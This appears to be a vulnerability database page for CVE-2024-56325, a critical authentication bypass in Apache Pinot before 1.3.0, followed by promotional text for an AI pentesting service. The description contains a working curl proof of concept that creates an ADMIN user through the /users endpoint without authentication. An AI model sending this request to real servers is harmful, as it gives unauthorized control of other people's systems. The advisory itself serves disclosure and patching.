CVE-2024-56325
Last modified
CVE-2024-56325 is a critical-severity vulnerability rated 9.8/10 on the CVSS scale. Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.. EPSS estimates a 78.19% chance of exploitation in the next 30 days.
Description
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Apache | Pinot | < 1.3.0 |
References
- https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8vMailing List, Vendor Advisory
- http://www.openwall.com/lists/oss-security/2025/03/27/8Mailing List, Third Party Advisory
Timeline
- Published
- Last Modified
- Status
- Analyzed
Frequently Asked Questions
What is CVE-2024-56325?
How severe is CVE-2024-56325?
How do I fix CVE-2024-56325?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2024
- CVE-2024-5632Longse NVR (Network Video Recorder) model NVR3608PGE2W, as w…5.3
- CVE-2024-56320GoCD is a continuous deliver server. GoCD versions prior to …8.8
- CVE-2024-56321GoCD is a continuous deliver server. GoCD versions 18.9.0 th…3.8
- CVE-2024-56322GoCD is a continuous deliver server. GoCD versions 16.7.0 th…7.2
- CVE-2024-56323OpenFGA is an authorization/permission engine. IN OpenFGA v1…9.8
- CVE-2024-56324GoCD is a continuous deliver server. GoCD versions prior to …7.1
- CVE-2024-56326Jinja is an extensible templating engine. Prior to 3.1.5, An…7.8
- CVE-2024-56327pyrage is a set of Python bindings for the rage file encrypt…9.8
- CVE-2024-56328Discourse is an open source platform for community discussio…6.1
- CVE-2024-56329Socialstream is a third-party package for Laravel Jetstream.…8.9
- CVE-2024-5633Longse model LBH30FE200W cameras, as well as products based …7.5
- CVE-2024-56330Stardust is a platform for streaming isolated desktop contai…9.3
Are you affected by CVE-2024-56325?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
